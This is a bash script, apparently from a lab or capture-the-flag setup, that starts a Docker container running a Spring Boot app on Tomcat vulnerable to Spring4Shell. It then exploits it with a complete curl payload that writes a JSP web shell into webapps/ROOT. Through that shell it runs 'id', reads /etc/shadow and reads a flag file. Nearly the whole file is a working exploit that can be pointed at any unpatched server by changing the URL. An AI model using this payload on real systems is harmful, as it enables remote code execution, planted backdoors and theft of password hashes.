exploit.sh

#!/usr/bin/env bash
echo "[+] Starting Tomcat 9.0 server with Spring Boot application vulnerable to Spring4Shell..."
docker-compose up -d

echo "[+] Waiting 10 seconds for server to start..."

sleep 10

echo "[SERVER][+] webapps/ROOT dir before exploit"
docker-compose exec app ls webapps/ROOT
echo

echo "[+] Exploiting Spring4Shell vulnerability in server: http://localhost:8080/helloworld/greeting"
curl -H "prefix:<%" -H "suffix:%>//" -H "c:Runtime" -H "Content-Type: application/x-www-form-urlencoded" -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/helloworld/greeting
echo
echo

echo "[SERVER][+] webapps/ROOT dir after exploit, should include shell.jsp"
docker-compose exec app ls webapps/ROOT
echo

echo "[+] Shell is now accessible at: http://localhost:8080/shell.jsp?cmd=<cmd>"
echo "[+] Waiting 10 seconds..."
sleep 10

echo "[+] Running command: http://localhost:8080/shell.jsp?cmd=id"
curl --output - http://localhost:8080/shell.jsp?cmd=id
echo

echo "[+] Running command: http://localhost:8080/shell.jsp?cmd=cat /etc/shadow"
curl --output - "http://localhost:8080/shell.jsp?cmd=cat%20/etc/shadow"
echo

echo "[+] Running command: http://localhost:8080/shell.jsp?cmd=cat /flag"
curl --output - "http://localhost:8080/shell.jsp?cmd=cat%20/flag"
echo

docker-compose kill && docker-compose rm -f